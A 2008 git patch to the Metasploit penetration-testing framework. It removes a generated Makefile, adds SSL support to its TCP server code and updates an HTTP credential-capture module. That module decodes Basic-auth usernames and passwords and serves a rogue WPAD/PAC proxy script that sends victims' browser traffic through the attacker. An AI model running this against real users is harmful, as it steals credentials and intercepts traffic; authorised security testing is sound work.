From 1ea29ba8f015a789545e17c39256f4777afad746 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 22 Mar 2008 06:34:52 +0000 Subject: [PATCH] Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650da --- external/ruby-lorcon/Makefile | 142 ----------------------- lib/msf/core/exploit/tcp.rb | 12 +- lib/rex/socket/ssl_tcp_server.rb | 32 ++--- modules/auxiliary/server/capture/http.rb | 21 ++-- 4 files changed, 42 insertions(+), 165 deletions(-) delete mode 100644 external/ruby-lorcon/Makefile diff --git a/external/ruby-lorcon/Makefile b/external/ruby-lorcon/Makefile deleted file mode 100644 index e957faa6ec..0000000000 --- a/external/ruby-lorcon/Makefile +++ /dev/null @@ -1,142 +0,0 @@ - -SHELL = /bin/sh - -#### Start of system configuration section. #### - -srcdir = . -topdir = /usr/lib/ruby/1.8/i686-linux -hdrdir = $(topdir) -VPATH = $(srcdir):$(topdir):$(hdrdir) -prefix = $(DESTDIR)/usr -exec_prefix = $(DESTDIR)/usr -sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby -rubylibdir = $(libdir)/ruby/$(ruby_version) -archdir = $(rubylibdir)/$(arch) -sbindir = $(exec_prefix)/sbin -datadir = $(DESTDIR)/usr/share -includedir = $(prefix)/include -infodir = $(DESTDIR)/usr/share/info -sysconfdir = $(DESTDIR)/etc -mandir = $(DESTDIR)/usr/share/man -libdir = $(DESTDIR)/usr/lib -sharedstatedir = $(prefix)/com -oldincludedir = $(DESTDIR)/usr/include -sitearchdir = $(sitelibdir)/$(sitearch) -bindir = $(exec_prefix)/bin -localstatedir = $(DESTDIR)/var/lib -sitelibdir = $(sitedir)/$(ruby_version) -libexecdir = $(exec_prefix)/libexec - -CC = i686-pc-linux-gnu-gcc -LIBRUBY = $(LIBRUBY_SO) -LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a -LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME) -LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static - -RUBY_EXTCONF_H = -CFLAGS = -fPIC -O2 -march=pentium4 -fPIC -INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I. -CPPFLAGS = -CXXFLAGS = $(CFLAGS) -DLDFLAGS = -LDSHARED = $(CC) -shared -AR = i686-pc-linux-gnu-ar -EXEEXT = - -RUBY_INSTALL_NAME = ruby18 -RUBY_SO_NAME = ruby18 -arch = i686-linux -sitearch = i686-linux -ruby_version = 1.8 -ruby = /usr/bin/ruby18 -RUBY = $(ruby) -RM = rm -f -MAKEDIRS = mkdir -p -INSTALL = /bin/install -c -INSTALL_PROG = $(INSTALL) -m 0755 -INSTALL_DATA = $(INSTALL) -m 644 -COPY = cp - -#### End of system configuration section. #### - -preload = - -libpath = $(libdir) -LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)' -DEFFILE = - -CLEANFILES = -DISTCLEANFILES = - -extout = -extout_prefix = -target_prefix = -LOCAL_LIBS = -LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc -SRCS = Lorcon.c -OBJS = Lorcon.o -TARGET = Lorcon -DLLIB = $(TARGET).so -EXTSTATIC = -STATIC_LIB = - -RUBYCOMMONDIR = $(sitedir)$(target_prefix) -RUBYLIBDIR = $(sitelibdir)$(target_prefix) -RUBYARCHDIR = $(sitearchdir)$(target_prefix) - -TARGET_SO = $(DLLIB) -CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map -CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak - -all: $(DLLIB) -static: $(STATIC_LIB) - -clean: - @-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES) - -distclean: clean - @-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log - @-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES) - -realclean: distclean -install: install-so install-rb - -install-so: $(RUBYARCHDIR) -install-so: $(RUBYARCHDIR)/$(DLLIB) -$(RUBYARCHDIR)/$(DLLIB): $(DLLIB) - $(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR) -install-rb: pre-install-rb install-rb-default -install-rb-default: pre-install-rb-default -pre-install-rb: Makefile -pre-install-rb-default: Makefile -$(RUBYARCHDIR): - $(MAKEDIRS) $@ - -site-install: site-install-so site-install-rb -site-install-so: install-so -site-install-rb: install-rb - -.SUFFIXES: .c .m .cc .cxx .cpp .C .o - -.cc.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.cxx.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.cpp.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.C.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.c.o: - $(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $< - -$(DLLIB): $(OBJS) - @-$(RM) $@ - $(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS) - - - -$(OBJS): ruby.h defines.h diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 606bf1faee..3373a36c58 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer register_options( [ + Opt::SSL, OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]), - OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]) + OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), ], Msf::Exploit::Remote::TcpServer) register_evasion_options( @@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer self.service = Rex::Socket::TcpServer.create( 'LocalHost' => srvhost, 'LocalPort' => srvport, + 'SSL' => ssl, 'Context' => { 'Msf' => framework, @@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer datastore['SRVPORT'] end + # + # Returns the SSL option + # + def ssl + datastore['SSL'] + end + + # # Re-generates the payload, substituting the current RHOST and RPORT with # the supplied client host and port from the socket. diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb index 85a16c89d9..3264cdabac 100644 --- a/lib/rex/socket/ssl_tcp_server.rb +++ b/lib/rex/socket/ssl_tcp_server.rb @@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer def accept(opts = {}) sock = super() - if (sock) - sock.extend(Rex::Socket::Tcp) - sock.context = self.context - pn = sock.getpeername + return nil if not sock + + sock.extend(Rex::Socket::Tcp) + sock.context = self.context + pn = sock.getpeername - sock.peerhost = pn[1] - sock.peerport = pn[2] - end - t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) - t.extend(Rex::Socket::Tcp) - t.accept - - t + begin + t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) + t.extend(Rex::Socket::Tcp) + t.peerhost = pn[1] + t.peerport = pn[2] + t.accept + t + rescue ::OpenSSL::SSL::SSLError + sock.close + nil + end end @@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer cert.subject = subject cert.issuer = issuer - cert.not_before = Time.now - cert.not_after = Time.now + 3600 + cert.not_before = Time.now - 7200 + cert.not_after = Time.now + 7200 cert.public_key = key.public_key ef = OpenSSL::X509::ExtensionFactory.new(nil,cert) cert.extensions = [ diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 0629810586..051db897bd 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary end def run + @myhost = datastore['SRVHOST'] + @myport = datastore['SRVPORT'] exploit() end @@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary end def dispatch_request(cli, req) - + + mysrc = Rex::Socket.source_address(cli.peerhost) + hhead = (req['Host'] || @myhost).split(':', 2)[0] + if(req['Authorization'] and req['Authorization'] =~ /basic/i) basic,auth = req['Authorization'].split(/\s+/) user,pass = Rex::Text.decode_base64(auth).split(':', 2) report_auth_info( :host => cli.peerhost, :proto => 'http', - :targ_host => req['Host'] || datastore['SRVHOST'], - :targ_port => datastore['SRVPORT'], + :targ_host => hhead, + :targ_port => @myport, :user => user, :pass => pass, :extra => req.resource.to_s ) - print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}") + print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") end if(req.resource =~ /^wpad.dat|.*\.pac$/i) - prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }" + prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" res = "HTTP/1.1 200 OK\r\n" + - "Host: #{req['Host'] || datastore['SRVHOST']}\r\n" + + "Host: #{hhead}\r\n" + "Content-Type: application/x-ns-proxy-autoconfig\r\n" + "Content-Length: #{prx.length}\r\n" + "Connection: Close\r\n\r\n#{prx}" @@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary return end - print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}") + print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}") - data = "Connecting..." + data = "Connecting..." res = "HTTP/1.1 200 OK\r\n" + "Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +